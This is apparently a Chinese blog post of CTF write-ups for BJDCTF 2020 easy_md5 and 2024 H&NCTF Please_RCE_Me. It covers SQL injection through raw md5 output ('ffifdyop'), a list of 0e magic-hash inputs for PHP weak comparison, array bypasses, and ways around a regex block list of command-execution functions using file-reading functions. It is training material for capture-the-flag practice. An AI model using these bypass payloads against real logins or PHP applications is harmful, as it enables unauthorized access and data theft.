1 2 3 4 5 6 7 8 9 title: 做题记录 categories: - web - abbrlink: 2701 date: YYYY-MM-DD HH:mm:ss tags: - web -
[BJDCTF 2020]easy_md5
使用bp抓包发包可以得到hint
1 hint:select * from 'admin' where password=md5($pass,true)
突破点在md5的用法
可以看到,如果raw这里是true,那么返回是是字符串的二进制格式
如果让md5值经过hex转换为字符串后为’or’+balabala,那么拼接后构成的SQL语句为
1 select * from 'admin' where password=''or'balabala'
当or后面的值为true时,就可构成万能密码,从而实现SQL注入
在这里,我们需要知道MySQL的一个特性
在mysql里面,在用作布尔型判断时,or后面的字符型语句如果是以数字开头的,返回值就是true,即
1 2 3 4 5 6 7 or'数字+任意字符' 例如 select * from `admin` where password=''or'1abcdefg' ---> True select * from `admin` where password=''or'0abcdefg' ---> False select * from `admin` where password=''or'1' ---> True select * from `admin` where password=''or'2' ---> True select * from `admin` where password=''or'0' ---> False
只要or后面的字符串的首字母为数字都会返回true,这是我们的突破点
这里提供一个最常用的:ffifdyop,该字符串md5加密后若raw参数为true会返回’or’
ffifdyop的原理:https://www.cnblogs.com/redfish404/articles/17878453.html
所以直接输入ffifdyop
查看源代码,得到
1 2 3 4 5 6 7 <!-- $a = $GET['a']; $b = $_GET['b']; if($a != $b && md5($a) == md5($b)){ header('Location: levell14.php'); -->
这里是md5的弱类型比较,
当两个字符串经过MD5后转换为以0e开头 的字符串进行比较时,返回true
有以下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 s878926199a 0e545993274517709034328855841020 s155964671a 0e342768416822451524974117254469 s214587387a 0e848240448830537924465865611904 s214587387a 0e848240448830537924465865611904 s878926199a 0e545993274517709034328855841020 s1091221200a 0e940624217856561557816327384675 s1885207154a 0e509367213418206700842008763514 s1502113478a 0e861580163291561247404381396064 s1885207154a 0e509367213418206700842008763514 s1836677006a 0e481036490867661113260034900752 s155964671a 0e342768416822451524974117254469 s1184209335a 0e072485820392773389523109082030 s1665632922a 0e731198061491163073197128363787 s1502113478a 0e861580163291561247404381396064 s1836677006a 0e481036490867661113260034900752 s1091221200a 0e940624217856561557816327384675 s155964671a 0e342768416822451524974117254469 s1502113478a 0e861580163291561247404381396064 s155964671a 0e342768416822451524974117254469 s1665632922a 0e731198061491163073197128363787 s155964671a 0e342768416822451524974117254469 s1091221200a 0e940624217856561557816327384675 s1836677006a 0e481036490867661113260034900752 s1885207154a 0e509367213418206700842008763514 s532378020a 0e220463095855511507588041205815 s878926199a 0e545993274517709034328855841020 s1091221200a 0e940624217856561557816327384675 s214587387a 0e848240448830537924465865611904 s1502113478a 0e861580163291561247404381396064 s1091221200a 0e940624217856561557816327384675 s1665632922a 0e731198061491163073197128363787 s1885207154a 0e509367213418206700842008763514 s1836677006a 0e481036490867661113260034900752 s1665632922a 0e731198061491163073197128363787 s878926199a 0e545993274517709034328855841020
paylod:
?a=s878926199a&b=s1665632922a
返回:
1 2 3 4 5 6 7 8 9 <?php error_reporting(0); include "flag.php"; highlight_file(__FILE__); if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){ echo $flag; }
这里利用了md5的强比较漏洞
由于MD5是无法识别数组的,所以当MD5的数组返回为null,
所以payload:
参考:md5,sha1比较漏洞
2024H&NCTF(Please_RCE_Me) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 <?php if($_GET['moran'] === 'flag'){ highlight_file(__FILE__); if(isset($_POST['task'])&&isset($_POST['flag'])){ $str1 = $_POST['task']; $str2 = $_POST['flag']; if(preg_match('/system|eval|assert|call|create|preg|sort|{|}|filter|exec|passthru|proc|open|echo|`| |\.|include|require|flag/i',$str1) || strlen($str2) != 19 || preg_match('/please_give_me_flag/',$str2)){ die('hacker!'); }else{ preg_replace("/please_give_me_flag/ei",$_POST['task'],$_POST['flag']); } } }else{ echo "moran want a flag.</br>(?moran=flag)"; }
因为flag的值必须为19而且能与please_give_me_flag匹配,所以可以利用大小写绕过 ,flag=please_give_me_flaG
对于task,明显过滤了很多常见的命令执行函数
这里有四个函数,可以参考参考
1.readfile
2.show_source(显示当前文件的源代码或者文本内容)
3.highlight_file
4.file_get_contents
5.编码